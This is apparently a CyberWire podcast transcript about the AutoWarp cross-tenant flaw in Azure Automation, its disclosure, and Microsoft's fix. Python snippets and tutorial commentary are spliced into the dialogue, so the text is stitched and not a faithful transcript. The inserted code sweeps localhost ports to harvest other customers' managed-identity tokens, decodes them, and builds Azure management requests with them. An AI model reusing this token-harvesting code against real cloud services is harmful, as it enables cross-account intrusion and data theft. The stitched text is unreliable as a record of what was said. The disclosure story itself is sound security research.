CyberWire Daily - AutoWarp bug leads to Automation headaches. [Research Saturday]
Episode Date: May 21, 2022. Yanir Tsarimi from Orca Security joins Dave to discuss how researchers discovered a critical Azure Automation service vulnerability called AutoWarp. The security flaw was discovered this past March, prompting Yanir to leap into action and report the issue to Microsoft, who helped swiftly resolve the cross-account vulnerability. The research shows how this serious flaw could allow attackers unauthorized access to other customer accounts, potentially granting full control over resources and data belonging to those accounts, putting multiple Fortune 500 companies and billions of dollars at risk. The research also shares the crucial timeline of the discovery and Microsoft's response to the vulnerability. The research can be found here: AutoWarp: Critical Cross-Account Vulnerability in Microsoft Azure Automation Service. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
You're listening to the Cyber Wire Network, powered by N2K. That's where Domo's AI and data products platform comes in. With Domo, you can channel AI and data into innovative uses that
deliver measurable impact. Secure AI agents connect, prepare, and automate your data workflows,
helping you gain insights, receive alerts, and act with ease through guided apps tailored to
your role. Data is hard. Domo is easy. Learn more at ai.domo.com.
That's ai.domo.com.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down threats and vulnerabilities,
solving some of the hard problems of protecting ourselves in a rapidly evolving cyberspace.
Thanks for joining us.
I was looking for a new research target,
and I somehow randomly got to Azure Automation,
and it made my eyes pop up,
and I thought, okay, this might be interesting,
and I want to look further.
That's Yanir Tsarimi.
He's a cloud security researcher at Orca Security.
The research we're discussing today is titled
AutoWarp, Critical Cross-Account Vulnerability
in Microsoft Azure Automation Service.
And now, a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise, with an 18% year-over-year increase in ransomware attacks
and a $75 million record payout in 2024.
These traditional security tools expand your attack surface with public-facing
IPs that are exploited by bad actors more easily than ever with AI tools. It's time to rethink your
security. Zscaler Zero Trust plus AI stops attackers by hiding your attack surface, making
apps and IPs invisible, and eliminating lateral movement by connecting users only to specific apps, not the entire network.
Continuously verifying every request based on identity and context.
Simplifying security management with AI-powered automation.
And detecting threats using AI to analyze over 500 billion daily transactions.
Hackers can't attack what they can't see.
Protect your organization with Zscaler Zero Trust and AI. Learn more at zscaler.com/security.
So this is like how I got it.
How I got to it, it was really, really random.
Some may say it was like a stroke of luck,
like how it all went down.
But it was really like, it's my job.
I do the research and I got specifically to Azure Automation like in a random way.
Well, there is that old saying that luck favors the prepared mind.
So I suppose in a way you were primed to notice something
that caught your attention, as you say.
So walk me through this.
What exactly was it that caught your eye?
So when I was looking at the automation service,
I saw that you can upload scripts
and run them inside the environment of Azure.
And I was like, okay, so let's see what I can do with it.
So I uploaded a simple Python script
and I started a reverse shell.
So I had a reverse shell inside the environment.
So I was just typing up commands and looking around
what processes are running inside, what files are there.
And I was looking around in the file system
and I remember that I'd seen a strange directory on the C: drive.
So I was looking at the directory and inside I saw a log file. So it was like
a folder that you don't usually see on like a standard Windows machine. So I was like
looking at the log and like reading it. It was pretty short, like just a few lines. And
I remember seeing like an HTTP URL inside the log file.
And I said, okay, there's an HTTP server set up locally
because the URL was pointing to local host.
And it had like a weird port.
The port was 40,008, something like that.
It was like a completely random number.
Like I didn't really understand
why would someone like choose this number specifically.
So it's like something that caught my eye.
So I wanted to understand
why is there a server
and why this port specifically.
I started with making requests
to the local server
just to see what would come up
and I got like errors and like forbidden.
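The kind of local poking Yanir describes, making an HTTP request against a localhost port just to see what answers, can be sketched in Python. The port and path here are illustrative, not the actual Azure Automation internals:

```python
import http.client

def probe(port: int, path: str = "/", timeout: float = 0.5) -> str:
    """GET http://127.0.0.1:<port><path> and report what came back."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        # A 403 here would match the "forbidden" responses described above.
        return f"HTTP {resp.status}"
    except OSError:
        return "unreachable"
    finally:
        conn.close()
```

On the sandbox machine, even a 403 Forbidden from the mystery port is a finding: it proves a server is listening and that some authentication gate exists in front of it.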
So I just looked more inside the machine until I found DLL files,
and those DLL files were the code of the sandbox.
Because when you run inside the automation environment, you are basically running inside a machine with other customers,
but you are supposed to be isolated from other customers.
So I took this code and I started looking into it
until I found I did a reverse engineering of the code
and I saw that that server was actually an interesting server
because you could actually make a request
and receive the token of your managed identity.
So what is the managed identity?
It's basically a token that allows you to access
all the resources in your Azure account.
So when you have this token, for example, if I want to use Azure Automation to create
a new virtual machine inside my Azure account, I can use this token and give it permissions
to create that virtual machine.
And when I can have this token and use it for other resources,
this could be interesting.
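Once you hold a managed identity token, using it is just a matter of attaching it as a bearer credential to Azure Resource Manager calls. A minimal sketch, building (not sending) such a request; the endpoint and `api-version` follow the public ARM REST API, but treat the details as illustrative:

```python
import urllib.request

ARM = "https://management.azure.com"

def list_subscriptions_request(access_token: str) -> urllib.request.Request:
    """Build an ARM request listing the subscriptions visible to the token.

    Whoever holds the token can send this and act with its permissions --
    which is exactly why leaking another tenant's token is so severe.
    """
    return urllib.request.Request(
        f"{ARM}/subscriptions?api-version=2020-01-01",
        headers={"Authorization": f"Bearer {access_token}"},
    )
```

The token is the entire credential: no password, no certificate, just a bearer string in a header.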
So I didn't really know if this would be interesting or not
because I only knew the basics at this point.
The only thing that mattered to me is that random number
that the software engineers chose for this port, for this server.
At this point, I mean, the token that you've gotten back is your token.
So am I correct there?
Yeah.
So I was using my own port.
It was like my own assigned server.
So the token was for my account.
I see.
So nothing terribly unusual there or raising any red flags when it comes to security of that.
So, yeah, it seemed like it should be happening.
Like, it seemed like a feature, not a bug.
But when I thought about it, after a few minutes I started to think, okay, when I started a new automation job, I would see that the port in the log
file changed.
It was 40,008, and sometimes it was 40,020.
It was always around 40,000, but it changed.
Each time I ran a new job, I got a different port.
So I said, okay, they are assigning a random port.
It seemed natural to me that they were trying
to create some kind of isolation,
because when I was researching that server,
I saw that they had some kind of
authentication in place and
security to prevent
unauthorized access to the server.
But the problem is, when I started scanning inside the machine, I saw that other ports
were available, and they answered to me just like my own server.
So I just started saying, okay, let's try to make the same request for the token.
But instead of using my own port,
I will try to use other ports around that range.
So I went from 40,000 and up to like,
I did try like 100 ports up,
and I started to receive tokens.
So I was like, when I saw the tokens,
I was like taken aback, like,
okay, what is going on here?
Is this what I think it is?
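The sweep Yanir describes, reusing his own token request against the neighboring ports, looks roughly like this. The path and port range are assumptions for illustration; the real endpoint was internal to the Automation sandbox:

```python
import json
import urllib.error
import urllib.request

def sweep_for_tokens(start: int = 40000, count: int = 100,
                     timeout: float = 0.5) -> dict:
    """Try the same token request against each port in the range.

    Any port that answers with a token belongs to some other tenant's
    sandbox -- the cross-account bug in a nutshell.
    """
    found = {}
    for port in range(start, start + count):
        url = f"http://127.0.0.1:{port}/oauth2/token"  # hypothetical path
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                found[port] = json.load(resp)
        except (urllib.error.URLError, OSError, ValueError):
            continue  # closed port, refused connection, or non-JSON reply
    return found
```

The striking part of the finding is how little attacker machinery this requires: a loop, a hundred requests, and no authentication at all.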
Yeah, it really caught me off guard.
I was like two hours into looking at the service
and I thought there's no way that something like this would be so easy.
I was taking the token and the thing with this token is
it's a JWT, a JSON Web Token. So you can actually
decode it and see what data is stored inside the token. What I did is I looked
at the data of the tokens I received and I've seen that they are attached to other customer
subscriptions. So I've seen like subscriptions of other companies and I've seen
names and all that kind of stuff. So I was like, okay, this is an issue. Like this is
really something that shouldn't be happening. So I set up, let's say, a victim
account just to, to try to see if I can actually access another account through this token.
And it actually worked.
And I was even more surprised that it actually worked.
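The "decode it and see what data is stored inside" step works because JWTs are signed but not encrypted: the middle segment is just base64url-encoded JSON. A self-contained sketch with a fabricated token; claim names like `tid` (tenant ID) follow Azure conventions, but the values here are made up:

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode (without verifying!) the claims segment of a JWT."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore the stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Build a fake three-segment token just to demonstrate the decoding.
claims = {"tid": "some-tenant-id", "xms_mirid": "/subscriptions/<sub>/..."}
segments = [
    base64.urlsafe_b64encode(b'{"alg":"none"}').rstrip(b"=").decode(),
    base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode(),
    "",  # empty signature segment for the demo
]
fake_token = ".".join(segments)
print(jwt_payload(fake_token)["tid"])  # prints "some-tenant-id"
```

This is exactly how a researcher can tell, without ever using a leaked token, that it belongs to someone else's subscription: the tenant and resource identifiers are sitting in plain sight in the claims.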
Against the Azure API, if the identity was given any permissions,
you could just use those permissions in the other customers' accounts.
So I was really, really surprised
and I was like holding my head like,
I can't believe this really, it was really this simple.
And I just, I don't have any words to say.
It's something that feels a bit bizarre or surreal,
for something like this to happen.
Right. So at that point, what did you think?
I mean, do you say to yourself, well, I need to get in touch with Microsoft about this?
Yeah. So this is like a standard procedure here. We do the security research, and the moment we find something that we think is a security issue,
we go straight ahead.
I wrote up the report to Microsoft the same day
and submitted it to them.
And they fixed it within four days, I think.
And what was the fix?
So the issue was that you could access,
you could just ask for the tokens, right?
So they had to put some kind of authentication in place,
or block access to the server entirely.
So Microsoft chose to mitigate this
by requiring a special secret token
that only the customer itself should know.
So when you start up a new automation job,
in your environment variables,
you get this special token. And when you request the managed identity token from the server,
you need to send them this token that you have in your environment variables.
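The fix follows the same pattern Azure uses elsewhere for managed identities: a per-job secret is injected into the sandbox's environment variables, and token requests must echo it back. A sketch of the post-fix request shape; the variable and header names mirror the general Azure `IDENTITY_HEADER` convention and are illustrative here:

```python
import os

def token_request(port: int) -> tuple:
    """Build the URL and headers for a post-fix token request.

    Without the secret from this job's own environment variables,
    a request to someone else's port is rejected.
    """
    secret = os.environ.get("IDENTITY_HEADER", "")  # assumed variable name
    url = f"http://127.0.0.1:{port}/oauth2/token"   # hypothetical path
    headers = {"X-IDENTITY-HEADER": secret}
    return url, headers
```

Because an attacker in a neighboring sandbox never sees your environment variables, the leaked-port trick no longer yields usable tokens.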
I see. Now, one of the things you point out in the research you published online here is that
Microsoft was quite responsive to you reaching out.
They were a good partner here.
Yeah, it was a really good experience with Microsoft.
They responded very, very quickly to all my emails
and they were really appreciative and cooperative
in fixing this problem.
It was really a positive experience.
I think that this is the thing that makes me,
as a security researcher, want to keep going and keep finding more security vulnerabilities
and report them to vendors who treat me
with respect and cooperation.
It also strikes me that part of what allowed you to get as far as you did with this
was that there were several steps along the way
where a lot of people would have given up
or moved on to something else,
and you hung in there and kept digging.
Yeah, this is actually an interesting part
about security research,
is that you can do research on one thing for months and have nothing.
But as long as you keep learning about your target and you stay persistent, you will find something.
The farther you go and the deeper you go, you will find issues that other people who gave up will
not find.
There's no other way to go about it.
You have to go the furthest to find the most interesting and severe vulnerabilities.
In this case, it all happened quite fast.
But in other security research that I did, it usually took a lot longer to get to security problems like this.
And are you satisfied that this has been properly mitigated?
Yes, I think Microsoft cares about those issues.
And I think we have a very good reason to keep going and look for more of those.
What are your recommendations for folks to protect themselves against these sorts of things?
I suppose there's no evidence that this itself was being exploited,
but it strikes me as one of those things where someone using Microsoft Azure, for example,
wouldn't have known that this was an issue.
I can speak specifically in this case.
I think the concept of least privilege would be really helpful here.
If you used Azure Automation and you assigned the minimal permissions that you actually need,
or even don't assign any permissions at all if you don't need them,
you will be at significantly less risk compared to someone who
just gave all the permissions to the managed identity. The concept of least privilege
really shows that it matters what you do, and the decisions you make,
even as a customer, can change how severely an issue like this exposes you.
Our thanks to Yanir Tsarimi from Orca Security for joining us.
The research is titled AutoWarp, Critical Cross-Account Vulnerability in Microsoft Azure Automation Service.
We'll have a link in the show notes.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity.
That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how they're co-building the next generation of cybersecurity teams and technologies.
Our amazing Cyber Wire team is Rachel Gelfand, Liz Ervin, Elliot Peltzman, Trey Hester, Brandon Karpf, Eliana White, Puru Prakash, Justin Sabey, Tim Nodar, Joe Carrigan, Carole Theriault, Ben Yelin, Nick Vilecki, Gina Johnson, Bennett Moe, Chris Russell, John
Petrick, Jennifer Eiben, Rick Howard, Peter Kilby, and I'm Dave Bittner. Thanks for listening. We'll
see you back here next week.